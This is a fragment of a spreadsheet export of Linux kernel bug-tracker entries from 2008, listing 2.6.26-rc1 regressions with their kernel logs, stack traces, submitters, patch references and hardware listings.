    <t>WARNING: at drivers/base/sys.c:183 sysdev_driver_register+0x56/0xe6()</t>
  </si>
  <si>
    <t>2.6.26-rc1-00077-g17aa7e0</t>
  </si>
  <si>
    <t>2008-05-05 21:55 UTC</t>
  </si>
  <si>
    <t>2008-05-08 09:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.26-rc1 Distribution: FC5 Hardware Environment: processor : 0 vendor_id : AuthenticAMD cpu family : 15 model : 35 model name : AMD Athlon(tm) 64 X2 Dual Core Processor 4800+ stepping : 2 cpu MHz : 2410.954 cache size : 1024 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt lm 3dnowext 3dnow pni lahf_lm cmp_legacy bogomips : 4825.13 clflush size : 64 power management: ts fid vid ttp processor : 1 vendor_id : AuthenticAMD cpu family : 15 model : 35 model name : AMD Athlon(tm) 64 X2 Dual Core Processor 4800+ stepping : 2 cpu MHz : 2410.954 cache size : 1024 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt lm 3dnowext 3dnow pni lahf_lm cmp_legacy bogomips : 4822.28 clflush size : 64 power management: ts fid vid ttp Software Environment: Problem Description: After booting up, found the following in dmesg...other than this the whole kernel seems ok - network/filesystem/processes etc.... RPC: Registered udp transport module. RPC: Registered tcp transport module. powernow-k8: Found 1 AMD Athlon(tm) 64 X2 Dual Core Processor 4800+ processors (2 cpu cores) (version 2.20.00) powernow-k8: MP systems not supported by PSB BIOS structure powernow-k8: MP systems not supported by PSB BIOS structure sysdev: class cpu: driver (c0599f64) has already been registered to a class, something is wrong, but will forge on! ------------[ cut here ]------------ WARNING: at drivers/base/sys.c:183 sysdev_driver_register+0x56/0xe6() Modules linked in: Pid: 1, comm: swapper Not tainted 2.6.26-rc1-00077-g17aa7e0 #1 [&lt;c011ee2e&gt;] warn_on_slowpath+0x40/0x67 [&lt;c02bb72f&gt;] write_msg+0x0/0x99 [&lt;c011eeaf&gt;] __call_console_drivers+0x54/0x60 [&lt;c0130e70&gt;] up+0x9/0x2a [&lt;c011f2c8&gt;] release_console_sem+0x169/0x182 [&lt;c0234dc2&gt;] acpi_ns_evaluate+0x2a/0x1a0 [&lt;c0234aab&gt;] acpi_evaluate_object+0x244/0x251 [&lt;c0210092&gt;] __next_cpu+0x12/0x21 [&lt;c024a139&gt;] acpi_processor_preregister_performance+0x500/0x50f [&lt;c011f743&gt;] printk+0x14/0x18 [&lt;c026fa48&gt;] sysdev_driver_register+0x56/0xe6 [&lt;c035e0a8&gt;] cpufreq_register_driver+0x9b/0x147 [&lt;c05bb420&gt;] kernel_init+0x11e/0x223 [&lt;c011ad01&gt;] schedule_tail+0x16/0x43 [&lt;c010346a&gt;] ret_from_fork+0x6/0x1c [&lt;c05bb302&gt;] kernel_init+0x0/0x223 [&lt;c05bb302&gt;] kernel_init+0x0/0x223 [&lt;c010415b&gt;] kernel_thread_helper+0x7/0x10 ======================= ---[ end trace ca84183dff0f2730 ]--- Using IPI No-Shortcut mode Freeing unused kernel memory: 244k freed input: ImExPS/2 Generic Explorer Mouse as /class/input/input4 ieee1394: Host added: ID:BUS[0-00:1023] GUID[0011d8000098ab88] kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. EXT3 FS on dm-0, internal journal kjournald starting. Commit interval 5 seconds Steps to reproduce: Detected at bootup.</t>
  </si>
  <si>
    <t>WARNING: at include/linux/blkdev.h:431 blk_queue_init_tags+0x110/0x11f()</t>
  </si>
  <si>
    <t>2.6.25-git16</t>
  </si>
  <si>
    <t>2008-05-07 15:07 UTC</t>
  </si>
  <si>
    <t>2008-06-13 07:10 UTC</t>
  </si>
  <si>
    <t>Subject : WARNING: at include/linux/blkdev.h:431 blk_queue_init_tags+0x110/0x11f() Submitter : "J.A. Magallón" &lt;jamagallon@ono.com&gt; Date : 2008-05-01 02:50 References : http://lkml.org/lkml/2008/4/30/614 Handled-By : Nick Piggin &lt;npiggin@suse.de&gt; Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops with strace_test</t>
  </si>
  <si>
    <t>2.6.25-06679-g0ff5ce7</t>
  </si>
  <si>
    <t>2008-05-07 15:13 UTC</t>
  </si>
  <si>
    <t>2008-05-13 03:02 UTC</t>
  </si>
  <si>
    <t>Subject : Oops with strace_test Submitter : Eric Sesterhenn &lt;snakebyte@gmx.de&gt; Date : 2008-04-30 14:12 References : http://lkml.org/lkml/2008/4/30/162 Handled-By : Suresh Siddha &lt;suresh.b.siddha@intel.com&gt; Patch : http://lkml.org/lkml/2008/5/7/225 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Horrendous Audio Stutter - current git</t>
  </si>
  <si>
    <t>2.5.25-git</t>
  </si>
  <si>
    <t>2008-05-07 15:26 UTC</t>
  </si>
  <si>
    <t>2008-06-15 19:30 UTC</t>
  </si>
  <si>
    <t>Subject : Horrendous Audio Stutter - current git Submitter : "Parag Warudkar" &lt;parag.warudkar@gmail.com&gt; Date : 2008-05-02 20:14 References : http://lkml.org/lkml/2008/5/1/440 Handled-By : Peter Zijlstra &lt;peterz@infradead.org&gt; Patch : http://lkml.org/lkml/2008/5/2/126 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[regression] ata2: device not ready (errno=-16), forcing hardreset</t>
  </si>
  <si>
    <t>2008-05-08 06:49 UTC</t>
  </si>
  <si>
    <t>2008-05-11 14:24 UTC</t>
  </si>
  <si>
    <t>[ 1.146787] PCI: Setting latency timer of device 0000:00:1f.1 to 64 [ 1.146787] scsi0 : ata_piix [ 1.146787] scsi1 : ata_piix [ 1.152149] ata1: PATA max UDMA/100 cmd 0x1f0 ctl 0x3f6 bmdma 0xffa0 irq 14 [ 1.152149] ata2: PATA max UDMA/100 cmd 0x170 ctl 0x376 bmdma 0xffa8 irq 15 [ 1.305660] ata1.01: ATAPI: HP DVD Writer 840b, FF66, max UDMA/33 [ 1.311600] ata1.01: configured for UDMA/33 [ 6.815205] ata2: link is slow to respond, please be patient (ready=0) [ 12.253365] ata2: device not ready (errno=-16), forcing hardreset [ 18.113797] ata2: link is slow to respond, please be patient (ready=0) [ 22.959853] ata2: SRST failed (errno=-16) [ 28.159854] ata2: link is slow to respond, please be patient (ready=0) [ 33.225104] ata2: SRST failed (errno=-16) [ 38.923079] ata2: link is slow to respond, please be patient (ready=0) [ 72.595753] ata2: SRST failed (errno=-16) [ 78.233188] ata2: SRST failed (errno=-16) [ 78.233229] ata2: reset failed, giving up Regression introducet by patch: commit 78ab88f04f44bed566d51dce0c7cbfeff6449a06 Author: Tejun Heo &lt;htejun@gmail.com&gt; Date: Thu May 1 23:41:41 2008 +0900 libata: improve post-reset device ready test Some controllers (jmb and inic162x) use 0x77 and 0x7f to indicate that the device isn't ready yet. It looks like they use 0xff if device presence is detected but connection isn't established. 0x77 or 0x7f after connection is established and use the value from signature FIS after receiving it. This patch implements ata_check_ready(), which takes TF status value and determines whether the port is ready or not considering the above and other conditions, and use it in @check_ready() functions. This is safe as both 0x77 and 0x7f aren't valid ready status value even though they have BSY bit cleared. This fixes hot plug detection failures which can be triggered with certain drives if they aren't already spun up when the data connector is hot plugged. Tested on sil, sil24, ahci (jmb/ich), piix and inic162x combined with eight drives from all major vendors. Signed-off-by: Tejun Heo &lt;htejun@gmail.com&gt; Signed-off-by: Jeff Garzik &lt;jgarzik@redhat.com&gt;</t>
  </si>
  <si>
    <t>VT switching broken - X does not resume (intel chipset)</t>
  </si>
  <si>
    <t>2.6.26-rc1-110-ga153063</t>
  </si>
  <si>
    <t>2008-05-08 06:53 UTC</t>
  </si>
  <si>
    <t>2008-05-20 03:05 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.25.1 Earliest failing kernel version:2.6.26-rc1 Distribution:Ubuntu 8.04 Hardy Hardware Environment:see attached lshw.txt Software Environment:xserver-xorg-video-intel 2:2.2.1-1ubuntu12 Problem Description: Suspend to ram, using the distribution scripts or just echo mem &gt; /sys/power/state. On resume, the screen stays blank (most of the time), with just the cursor shown (sometime you can move it, sometime no). The system is nevertheless working. Sometime you can recover by hitting ctr-alt-backspace and reenter X, sometime not. I can't test on console because after X starts, console is busted for me (that's not a regression, it has been like that since at least 2.6.23, and it was decided it was a x driver problem, but it's still not fixed for me... see https://bugs.launchpad.net/bugs/182865 ) I attach .config, lshw output, and two syslogs. syslog_2.6.25.txt shows a successfull suspend/resume cycle in 2.6.25.1. syslog_new.txt shows a boot of the new kernel, then a suspend/resume with ended with a blank video, resumed with a ctrl-alt-backspace, and finally a new suspend/resume ended with a blank screen that could not be resumed by a ctrl-alt-backspace, so sysrq-b was needed. Strange things I see: There is a WARN_ON at line 1485 of the log (sysdev_driver_register()) but seems unrelated. A lot of "ACPI handle has no context!" during suspend/resume A very scary "trying to get vblank count for disabled pipe 0" that smells as a possible guilty failure...</t>
  </si>
  <si>
    <t>WARNING: at include/linux/blkdev.h:443</t>
  </si>
  <si>
    <t>2.6.25-07422-gb66e1f1</t>
  </si>
  <si>
    <t>2008-05-08 11:42 UTC</t>
  </si>
  <si>
    <t>2008-05-15 15:25 UTC</t>
  </si>
  <si>
    <t>Subject : WARNING in 2.6.25-07422-gb66e1f1 Submitter : Prakash Punnoor &lt;prakash@punnoor.de&gt; Date : 2008-05-03 11:51 References : http://lkml.org/lkml/2008/5/3/43 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; Handled-By : Neil Brown &lt;neilb@suse.de&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>DVB build issue</t>
  </si>
  <si>
    <t>2008-05-08 12:14 UTC</t>
  </si>
  <si>
    <t>2008-05-15 08:45 UTC</t>
  </si>
  <si>
    <t>Subject : DVB build issue Submitter : Alistair John Strachan &lt;alistair@devzero.co.uk&gt; Date : 2008-05-03 22:47 References : http://lkml.org/lkml/2008/5/3/247 Handled-By : Mauro Carvalho Chehab &lt;mchehab@infradead.org&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-$sha1: RIP call_for_each</t>
  </si>
  <si>
    <t>2.6.25-c3bf9bc243092c53946fd6d8ebd6dc2f4e572d48</t>
  </si>
  <si>
    <t>2008-05-08 12:37 UTC</t>
  </si>
  <si>
    <t>2008-05-09 00:18 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.25-$sha1: RIP call_for_each Submitter : Alexey Dobriyan &lt;adobriyan@gmail.com&gt; Date : 2008-04-28 00:55 References : http://lkml.org/lkml/2008/4/27/227 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; Patch : http://lkml.org/lkml/2008/4/29/100 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26-rc1 c67x00-ll-hpi compilation failure</t>
  </si>
  <si>
    <t>2008-05-08 12:42 UTC</t>
  </si>
  <si>
    <t>2008-05-14 14:30 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc1 c67x00-ll-hpi compilation failure Submitter : Samuel Thibault &lt;samuel.thibault@ens-lyon.org&gt; Date : 2008-05-04 13:04 References : http://lkml.org/lkml/2008/5/4/84 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26-rc1-git1 -- trying to get vblank count for disabled pipe 0</t>
  </si>
  <si>
    <t>2.6.26-rc1-git1</t>
  </si>
  <si>
    <t>2008-05-08 12:47 UTC</t>
  </si>
  <si>
    <t>2008-05-29 13:50 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc1-git1 -- trying to get vblank count for disabled pipe 0 Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2008-05-04 21:12 References : http://lkml.org/lkml/2008/5/4/309 Handled-By : Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26-rc1-$sha1: RIP __d_lookup+0x8c/0x160</t>
  </si>
  <si>
    <t>2.6.26-rc1-afa26be86b65a7183ceac29bdf1f51d6fc6932f0</t>
  </si>
  <si>
    <t>2008-05-08 12:52 UTC</t>
  </si>
  <si>
    <t>2008-07-10 13:50 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc1-$sha1: RIP __d_lookup+0x8c/0x160 Submitter : Alexey Dobriyan &lt;adobriyan@gmail.com&gt; Date : 2008-05-05 09:59 References : http://lkml.org/lkml/2008/5/5/28 Handled-By : "Paul E. McKenney" &lt;paulmck@linux.vnet.ibm.com&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>USB devices plugged into dock are not discoverred until reload of ehci-hcd</t>
  </si>
  <si>
    <t>2008-05-08 12:55 UTC</t>
  </si>
  <si>
    <t>2008-05-31 11:29 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc1 regression since 2.6.25 Submitter : Lukas Hejtmanek &lt;xhejtman@ics.muni.cz&gt; Date : 2008-05-05 10:02 References : http://lkml.org/lkml/2008/5/5/77 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Please revert 709f744 (x86: bitops asm constraint fixes)</t>
  </si>
  <si>
    <t>commit 709f744</t>
  </si>
  <si>
    <t>2008-05-08 13:03 UTC</t>
  </si>
  <si>
    <t>2008-05-12 12:25 UTC</t>
  </si>
  <si>
    <t>Subject : Please revert 709f744 (x86: bitops asm constraint fixes) Submitter : Simon Holm Thøgersen &lt;odie@cs.aau.dk&gt; Date : 2005-05-05 09:35 References : http://www.ussg.iu.edu/hypermail/linux/kernel/0805.0/1963.html Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Handled-By : "Jan Beulich" &lt;jbeulich@novell.com&gt; Handled-By : Thomas Gleixner &lt;tglx@linutronix.de&gt; Patch : http://www.ussg.iu.edu/hypermail/linux/kernel/0805.0/2661.html This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.25-git-f74d505b58d36ceeef10e459094f0eb760681165</t>
  </si>
  <si>
    <t>2008-05-08 13:19 UTC</t>
  </si>
  <si>
    <t>2008-05-14 05:39 UTC</t>
  </si>
  <si>
    <t>Subject : Problem mounting ext2 using ext3? Submitter : Geert Uytterhoeven &lt;geert@linux-m68k.org&gt; Date : 2008-05-05 17:12 References : http://www.ussg.iu.edu/hypermail/linux/kernel/0805.0/2281.html Handled-By : Theodore Tso &lt;tytso@mit.edu&gt; Handled-By : Jan Kara &lt;jack@suse.cz&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121006820018050&amp;w=2 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>volanoMark regression with kernel 2.6.26-rc1</t>
  </si>
  <si>
    <t>2008-05-08 13:32 UTC</t>
  </si>
  <si>
    <t>2008-06-05 14:07 UTC</t>
  </si>
  <si>
    <t>Subject : volanoMark regression with kernel 2.6.26-rc1 Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2008-05-06 2:06 References : http://marc.info/?l=linux-kernel&amp;m=121003968414287&amp;w=2 Handled-By : Dhaval Giani &lt;dhaval@linux.vnet.ibm.com&gt; Handled-By : Srivatsa Vaddagiri &lt;vatsa@linux.vnet.ibm.com&gt; Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121015292616788&amp;w=2 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>AIM7 40% regression with 2.6.26-rc1</t>
  </si>
  <si>
    <t>2008-05-08 13:39 UTC</t>
  </si>
  <si>
    <t>2008-05-11 03:05 UTC</t>
  </si>
  <si>
    <t>Subject : AIM7 40% regression with 2.6.26-rc1 Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2008-05-06 5:48 References : http://marc.info/?l=linux-kernel&amp;m=121005301028699&amp;w=2 Handled-By : Matthew Wilcox &lt;matthew@wil.cx&gt; Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121024818315058&amp;w=2 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>sh migor_defconfig build breakage</t>
  </si>
  <si>
    <t>2.6.26-rc1-git</t>
  </si>
  <si>
    <t>2008-05-08 13:43 UTC</t>
  </si>
  <si>
    <t>2008-05-11 01:33 UTC</t>
  </si>
  <si>
    <t>Subject : sh migor_defconfig build breakage Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/5/8/395</t>
  </si>
  <si>
    <t>sysbench+mysql(oltp, readonly) 30% regression with 2.6.26-rc1</t>
  </si>
  <si>
    <t>2008-05-08 13:51 UTC</t>
  </si>
  <si>
    <t>2008-06-05 14:36 UTC</t>
  </si>
  <si>
    <t>Subject : sysbench+mysql(oltp, readonly) 30% regression with 2.6.26-rc1 Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2008-05-07 4:55 References : http://marc.info/?l=linux-kernel&amp;m=121013681527052&amp;w=2 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121015292616802&amp;w=2 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>parisc DISCONTIGMEM compile breakage</t>
  </si>
  <si>
    <t>2008-05-08 13:52 UTC</t>
  </si>
  <si>
    <t>2008-05-14 13:42 UTC</t>
  </si>
  <si>
    <t>Subject : parisc DISCONTIGMEM compile breakage Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://kerneltrap.org/mailarchive/linux-kernel/2008/5/6/1740534 Handled-By : Mel Gorman &lt;mel@csn.ul.ie&gt; Patch : http://kerneltrap.org/mailarchive/linux-kernel/2008/5/6/1741324</t>
  </si>
  <si>
    <t>audio skipping on 2.6.26-rc1</t>
  </si>
  <si>
    <t>2008-05-08 13:55 UTC</t>
  </si>
  <si>
    <t>2008-05-13 15:05 UTC</t>
  </si>
  <si>
    <t>Subject : audio skipping on 2.6.26-rc1 Submitter : Miklos Szeredi &lt;miklos@szeredi.hu&gt; Date : 2008-05-07 7:56 References : http://marc.info/?l=linux-kernel&amp;m=121014707707781&amp;w=2 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>general protection fault: 0000 [1] PREEMPT SMP DEBUG_PAGEALLOC</t>
  </si>
  <si>
    <t>commit 8a3415c4a692732de8278396bf3d3dda36ed4384</t>
  </si>
  <si>
    <t>2008-05-08 14:04 UTC</t>
  </si>
  <si>
    <t>2008-06-16 08:42 UTC</t>
  </si>
  <si>
    <t>Subject : general protection fault: 0000 [1] PREEMPT SMP DEBUG_PAGEALLOC Submitter : "Zdenek Kabelac" &lt;zdenek.kabelac@gmail.com&gt; Date : 2008-05-07 16:03 References : http://lkml.org/lkml/2008/5/7/48 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>s390 kvm_virtio.c build error</t>
  </si>
  <si>
    <t>2008-05-08 14:05 UTC</t>
  </si>
  <si>
    <t>2008-05-19 17:36 UTC</t>
  </si>
  <si>
    <t>Subject : s390 kvm_virtio.c build error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/5/3/155 Handled-By : Heiko Carstens &lt;heiko.carstens@de.ibm.com&gt; Avi Kivity &lt;avi@qumranet.com&gt; Rusty Russell &lt;rusty@rustcorp.com.au&gt; Patch : several nearly identical patches, KVM tree should bring one</t>
  </si>
  <si>
    <t>2.6.26-rc1 lost half the RAM on UltraSPARC 5</t>
  </si>
  <si>
    <t>2008-05-08 14:12 UTC</t>
  </si>
  <si>
    <t>2008-05-19 07:25 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc1 lost half the RAM on UltraSPARC 5 Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2008-05-07 20:36 References : http://lkml.org/lkml/2008/5/7/204 Handled-By : David Miller &lt;davem@davemloft.net&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2008-05-08 14:16 UTC</t>
  </si>
  <si>
    <t>2008-05-08 15:20 UTC</t>
  </si>
  <si>
    <t>Subject : distcc says: (dcc_pump_sendfile) ERROR: sendfile returned 0? can't cope (bisected) Submitter : Dan Williams &lt;dan.j.williams@intel.com&gt; Date : 2008-05-07 14:13 References : http://lkml.org/lkml/2008/5/7/298 Handled-By : Jens Axboe &lt;jens.axboe@oracle.com&gt; Handled-By : Tom Zanussi &lt;zanussi@comcast.net&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>A couple problems with -rc1-git5</t>
  </si>
  <si>
    <t>2.6.26-rc1-git5</t>
  </si>
  <si>
    <t>2008-05-08 14:22 UTC</t>
  </si>
  <si>
    <t>Subject : A couple problems with -rc1-git5 Submitter : "J.A. Magallón" &lt;jamagallon@ono.com&gt; Date : 2008-05-08 00:18 References : http://lkml.org/lkml/2008/5/7/342 Handled-By : FUJITA Tomonori &lt;fujita.tomonori@lab.ntt.co.jp&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>CONFIG_PRINTK_TIME broken on git HEAD ?</t>
  </si>
  <si>
    <t>2.6.26-rc1-00166-gc0a1811</t>
  </si>
  <si>
    <t>2008-05-08 14:26 UTC</t>
  </si>
  <si>
    <t>2008-06-09 04:16 UTC</t>
  </si>
  <si>
    <t>Subject : CONFIG_PRINTK_TIME broken on git HEAD ? Submitter : Gabriel C &lt;nix.or.die@googlemail.com&gt; Date : 2008-05-08 00:26 References : http://lkml.org/lkml/2008/5/7/352 Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>lxfb driver regression</t>
  </si>
  <si>
    <t>2008-05-08 14:31 UTC</t>
  </si>
  <si>
    <t>2008-05-18 15:15 UTC</t>
  </si>
  <si>
    <t>Subject : lxfb driver regression Submitter : Andres Salomon &lt;dilinger@queued.net&gt; Date : 2008-05-07 21:08 References : http://lkml.org/lkml/2008/5/7/441 Handled-By : Jens Rottmann &lt;JRottmann@lippert-at.de&gt; Patch : http://lkml.org/lkml/2008/5/8/207 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26-rcX VC console scrolling regression</t>
  </si>
  <si>
    <t>2008-05-08 14:36 UTC</t>
  </si>
  <si>
    <t>2008-05-18 16:21 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rcX VC console scrolling regression Submitter : David Miller &lt;davem@davemloft.net&gt; Date : 2008-05-07 21:46 References : http://lkml.org/lkml/2008/5/8/9 Handled-By : Jan Engelhardt &lt;jengelh@medozas.de&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26-git: ata_piix link is slow to respond regression.</t>
  </si>
  <si>
    <t>2008-05-08 14:41 UTC</t>
  </si>
  <si>
    <t>2008-05-14 14:33 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-git: ata_piix link is slow to respond regression. Submitter : Soeren Sonnenburg &lt;kernel@nn7.de&gt; Date : 2008-05-08 19:30 References : http://lkml.org/lkml/2008/5/8/290 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_setspeed gets BUG on Transmeta Crusoe CPU</t>
  </si>
  <si>
    <t>2008-05-08 19:22 UTC</t>
  </si>
  <si>
    <t>2011-07-30 05:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Distribution: Fedora 9(rawhide) Problem Description: Reading from /sys/devices/system/cpu/cpu0/cpufreq/scaling_setspeed gets BUG() on Transmeta CPU. See https://bugzilla.redhat.com/show_bug.cgi?id=443354 for more info.</t>
  </si>
  <si>
    <t>[drivers/media/video/vivi.c:337]: Memory leak: tmpbuf</t>
  </si>
  <si>
    <t>latest git tree</t>
  </si>
  <si>
    <t>2008-05-10 01:31 UTC</t>
  </si>
  <si>
    <t>2008-09-22 10:17 UTC</t>
  </si>
  <si>
    <t>The tmpbuf is not deallocated (if vbuf is NULL): char *tmpbuf = kmalloc(wmax * 2, GFP_ATOMIC); void *vbuf = videobuf_to_vmalloc(&amp;buf-&gt;vb); if (!tmpbuf) return; if (!vbuf) return;</t>
  </si>
  <si>
    <t>(patch queued)[drivers/usb/gadget/pxa27x_udc.c:655]: Memory leak: req</t>
  </si>
  <si>
    <t>2.6.27-rc6</t>
  </si>
  <si>
    <t>2008-05-10 01:37 UTC</t>
  </si>
  <si>
    <t>2009-03-17 09:12 UTC</t>
  </si>
  <si>
    <t>If the eq is NULL, req is not deallocated: req = kzalloc(sizeof *req, gfp_flags); if (!req || !_ep) return NULL;</t>
  </si>
  <si>
    <t>Regression in 2.6.25: No sound after suspend-to-ram and resume (snd_hda_intel)</t>
  </si>
  <si>
    <t>2008-05-10 05:16 UTC</t>
  </si>
  <si>
    <t>Jack Malmostoso</t>
  </si>
  <si>
    <t>2013-07-29 15:57 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.24 Earliest failing kernel version: 2.6.25 Distribution: Debian Sid, AMD64 Hardware Environment: Asus Z37E Output of lspci: 00:00.0 Host bridge: Intel Corporation Mobile PM965/GM965/GL960 Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 03) 00:1a.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #4 (rev 03) 00:1a.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #5 (rev 03) 00:1a.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #2 (rev 03) 00:1b.0 Audio device: Intel Corporation 82801H (ICH8 Family) HD Audio Controller (rev 03) 00:1c.0 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 1 (rev 03) 00:1c.2 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 3 (rev 03) 00:1c.3 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 4 (rev 03) 00:1c.4 PCI bridge: Intel Corporation 82801H (ICH8 Family) PCI Express Port 5 (rev 03) 00:1d.0 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #1 (rev 03) 00:1d.1 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #2 (rev 03) 00:1d.2 USB Controller: Intel Corporation 82801H (ICH8 Family) USB UHCI Controller #3 (rev 03) 00:1d.7 USB Controller: Intel Corporation 82801H (ICH8 Family) USB2 EHCI Controller #1 (rev 03) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev f3) 00:1f.0 ISA bridge: Intel Corporation 82801HEM (ICH8M) LPC Interface Controller (rev 03) 00:1f.1 IDE interface: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) IDE Controller (rev 03) 00:1f.2 SATA controller: Intel Corporation 82801HBM/HEM (ICH8M/ICH8M-E) SATA AHCI Controller (rev 03) 00:1f.3 SMBus: Intel Corporation 82801H (ICH8 Family) SMBus Controller (rev 03) 01:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8056 PCI-E Gigabit Ethernet Controller (rev 12) 02:00.0 SATA controller: JMicron Technologies, Inc. JMicron 20360/20363 AHCI Controller (rev 02) 03:00.0 Network controller: Intel Corporation PRO/Wireless 4965 AG or AGN Network Connection (rev 61) 06:01.0 FireWire (IEEE 1394): Ricoh Co Ltd R5C832 IEEE 1394 Controller (rev 05) 06:01.1 SD Host controller: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host Adapter (rev 22) 06:01.2 System peripheral: Ricoh Co Ltd R5C843 